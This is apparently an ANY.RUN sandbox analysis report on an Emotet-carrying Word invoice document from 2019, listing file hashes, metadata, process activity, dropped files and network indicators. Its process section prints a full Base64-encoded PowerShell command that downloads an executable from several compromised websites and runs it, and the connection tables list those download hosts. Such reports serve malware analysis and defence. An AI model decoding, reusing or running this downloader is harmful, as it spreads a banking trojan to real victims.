analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

INVOICE_ZC_739586.doc

Full analysis: https://app.any.run/tasks/1e27b5ce-fdba-4576-acdb-f3f83bb97dcb
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 09, 2019, 14:42:37
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: supply-chains, Subject: Refined, Author: Harrison Legros, Comments: transmitter Checking Account, Template: Normal.dotm, Last Saved By: Emmett Breitenberg, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Oct 8 07:25:00 2019, Last Saved Time/Date: Tue Oct 8 07:25:00 2019, Number of Pages: 1, Number of Words: 28, Number of Characters: 166, Security: 0
MD5:

E5261A2655F37F01CC6A7E546B3EC389

SHA1:

856D9FA4595E0F653DE87491053EC01F3B2F6DB0

SHA256:

FE427F1305F036946A54B95F7900F6B4B4691599A4FCBE8CBB8E552EDB8A485E

SSDEEP:

6144:4OsfUyZILkI07NSU4jJnLATfDhbq9XSwcyv01f9L:4OsfUyQX07NSU4VkPhbq9XoR1f9L

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 913.exe (PID: 3792)
      • 913.exe (PID: 3432)
  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 2356)
    • Creates files in the user directory

      • powershell.exe (PID: 2356)
    • Executed via WMI

      • powershell.exe (PID: 2356)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2356)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2908)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2908)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Kling
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 193
Paragraphs: 1
Lines: 1
Company: Watsica, Moen and Little
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 166
Words: 28
Pages: 1
ModifyDate: 2019:10:08 06:25:00
CreateDate: 2019:10:08 06:25:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Emmett Breitenberg
Template: Normal.dotm
Comments: transmitter Checking Account
Keywords: -
Author: Harrison Legros
Subject: Refined
Title: supply-chains
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
4
Malicious processes
0
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs powershell.exe 913.exe no specs 913.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2908"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\INVOICE_ZC_739586.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2356powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB3AGgAaQB0AGUAegB6AGgAPQAnAHUAcwBlAHIAZgBhAGMAaQBuAGcAbQBpAHUAJwA7ACQAdwBpAHQAaABkAHIAYQB3AGEAbABxAGoAdwAgAD0AIAAnADkAMQAzACcAOwAkAFYAaQBsAGwAYQBnAGUAagB6AGkAPQAnAHMAYwBoAGUAbQBhAHMAegBzAHAAJwA7ACQAaQBuAHYAbwBpAGMAZQB3AGYAdAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdwBpAHQAaABkAHIAYQB3AGEAbABxAGoAdwArACcALgBlAHgAZQAnADsAJABVAG4AYgByAGEAbgBkAGUAZABfAFcAbwBvAGQAZQBuAF8AQgBhAGwAbAByAGgAdAA9ACcAQwByAGUAZABpAHQAXwBDAGEAcgBkAF8AQQBjAGMAbwB1AG4AdABtAG8AbwAnADsAJABBAHUAdABvAF8ATABvAGEAbgBfAEEAYwBjAG8AdQBuAHQAaQBsAGkAPQAmACgAJwBuAGUAJwArACcAdwAtACcAKwAnAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAE4AZQB0AC4AVwBlAGIAYwBsAEkARQBuAHQAOwAkAGIAeQBwAGEAcwBzAGkAbgBnAGEAYQByAD0AJwBoAHQAdABwAHMAOgAvAC8AbgBvAHIAYgBlAHIAdAB3AGEAcwB6AGEAawAuAHAAbAAvAHQAbQBwAC8ANABhAHQAYwAtADgAaABwADIAbQA0ADgAbgB5AGUALQA0ADcALwBAAGgAdAB0AHAAcwA6AC8ALwBuAGcAdQBvAGkAYgBlAG8ALgBpAG4AZgBvAC8AdwBwAC0AYQBkAG0AaQBuAC8AZgByADYAegB1AGgAdwA4AC0AYwA3AHgAMwBlAGQAYwBoAHYAdwAtADkAMwA5ADMANwA1ADEAMgA1AC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AZgBhAHIAbQBlAHIAcwBtAGEAcgBrAGUAdAAuAHEAYQAvAGUAcwBoAG8AcAAvADIAMgBxADgALQA0AGMAcQB6ADcAaQB0AHMAagAtADMAMQAzAC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAHkAcABhAHIAYQBjAG8AcgBkAC4AYQB0AC8AdwBwAC0AYQBkAG0AaQBuAC8AaABvAHEAcgBuADYAMQAtAGkAdgBpAHgALQA4ADYAOAA4ADQANQA5AC8AQABoAHQAdABwADoALwAvAGkAbQBtAGkAYQBnAGUAbgB0AHMALgBjAG8ALgB1AGsALwB3AHAALQBhAGQAbQBpAG4ALwBmAGkAYgA4AGgANwB2AHAAcQBtAC0AMwBwAHYAMgBuAGMALQAyADIAOAA5ADUANwAzADQALwAnAC4AIgBzAFAATABgAEkAVAAiACgAJwBAACcAKQA7ACQAZABvAHQAYwBvAG0AbQBtAG8APQAnAGIAbAB1AGUAdABqAHIAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEwAYQBuAGQAaQBuAGcAagBuAGgAIABpAG4AIAAkAGIAeQBwAGEAcwBzAGkAbgBnAGEAYQByACkAewB0AHIAeQB7ACQAQQB1AHQAbwBfAEwAbwBhAG4AXwBBAGMAYwBvAHUAbgB0AGkAbABpAC4AIgBEAE8AdwBgAE4ATABvAEEAYABkAEYASQBgAGwARQAiACgAJABMAGEAbgBkAGkAbgBnAGoAbgBoACwAIAAkAGkAbgB2AG8AaQBjAGUAdwBmAHQAKQA7ACQASQBuAHQAZQBsAGwAaQBnAGUAbgB0AF8AQwBvAHQAdABvAG4AXwBCAGEAbABsAHMAagBpAD0AJwBnAHIAaQBkAGUAbgBhAGIAbABlAGQAZgBvAHcAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJABpAG4AdgBvAGkAYwBlAHcAZgB0ACkALgAiAEwAZQBgAE4ARwBgAFQAaAAiACAALQBnAGUAIAAzADUAMgA2ADUAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBUAGAAQQBSAHQAIgAoACQAaQBuAHYAbwBpAGMAZQB3AGYAdAApADsAJABBAHIAYwBoAGkAdABlAGMAdABqAHYAawA9ACcAUgBvAGEAZABuAHAAagAnADsAYgByAGUAYQBrADsAJABIAGEAbgBkAGMAcgBhAGYAdABlAGQAXwBQAGwAYQBzAHQAaQBjAF8AUABhAG4AdABzAGoAegBuAD0AJwBtAGEAcgBvAG8AbgBsAHAAbgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABQAHIAbwBkAHUAYwB0AGEAbQB2AD0AJwBwAGwAdQBtAHoAZABkACcAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3432"C:\Users\admin\913.exe" C:\Users\admin\913.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3792--12ddd079C:\Users\admin\913.exe913.exe
User:
admin
Integrity Level:
MEDIUM
Total events
1 927
Read events
1 413
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
2
Text files
2
Unknown types
17

Dropped files

PID
Process
Filename
Type
2908WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR3232.tmp.cvr
MD5:
SHA256:
2356powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P7RURYYC7C1KKXRNYOR8.temp
MD5:
SHA256:
2356powershell.exeC:\Users\admin\913.exe
MD5:
SHA256:
2908WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4222FBB4.wmfwmf
MD5:03A1AAF7F87A14407BA0CE844717D786
SHA256:1434B0292C680C07D12933D57F81B681A08A616D4D9EEFA3F34D8911EFAC7C6B
2908WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:7E0DF4BBD5AF9CB71D4D556689355F67
SHA256:3FF1E1B846A889697C556ACA74C67BFE7BFF760895E30964812AF470271EA9E5
2908WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\INVOICE_ZC_739586.doc.LNKlnk
MD5:3E09CF983AB68DD2EB3783876722F337
SHA256:82DEDA43E485FEC70D855A20531B72556E2F493B58AAE7A45832B6B4829A0020
2908WINWORD.EXEC:\Users\admin\Desktop\~$VOICE_ZC_739586.docpgc
MD5:5E0014BD371F54C466767FA4AE691A55
SHA256:61DC58F861500CE572FECB16BD1EFAF9D9AC2D331947FF0D88B6526A8113856B
2908WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:DCA4020AB1BD5A242EE2AD841F168E0E
SHA256:0FAEBE2569A13048C72ADB69646C34959AE2259DF73486215678E0D449E1F119
2908WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C21138BF.wmfwmf
MD5:9EB9AD2085E13ECC4E30D5F21AA176C4
SHA256:1B2EC7422DA8850BDED04F89E05576372ECC9A36CDE784ACD9BB3866D1E8EAD7
2908WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A0E3F9F7.wmfwmf
MD5:C9CF6B0B3C8766ADA647939D5F478FCA
SHA256:EBCC4BD99978C9300E27A11AAAF914CD16C7D45BB5EE52B7D2411401D06CDCA0
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
6
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2356
powershell.exe
GET
301
162.144.125.199:80
http://www.farmersmarket.qa/eshop/22q8-4cqz7itsj-313/
US
unknown
2356
powershell.exe
GET
404
162.144.125.199:80
http://farmersmarket.qa/eshop/22q8-4cqz7itsj-313/
US
html
6.47 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2356
powershell.exe
162.144.125.199:80
www.farmersmarket.qa
Unified Layer
US
unknown
2356
powershell.exe
46.242.245.94:443
norbertwaszak.pl
home.pl S.A.
PL
unknown
2356
powershell.exe
104.31.86.181:443
nguoibeo.info
Cloudflare Inc
US
shared
2356
powershell.exe
81.223.238.248:443
www.myparacord.at
Liberty Global Operations B.V.
AT
unknown

DNS requests

Domain
IP
Reputation
norbertwaszak.pl
  • 46.242.245.94
unknown
nguoibeo.info
  • 104.31.86.181
  • 104.31.87.181
unknown
www.farmersmarket.qa
  • 162.144.125.199
unknown
farmersmarket.qa
  • 162.144.125.199
unknown
www.myparacord.at
  • 81.223.238.248
unknown

Threats

No threats detected
No debug info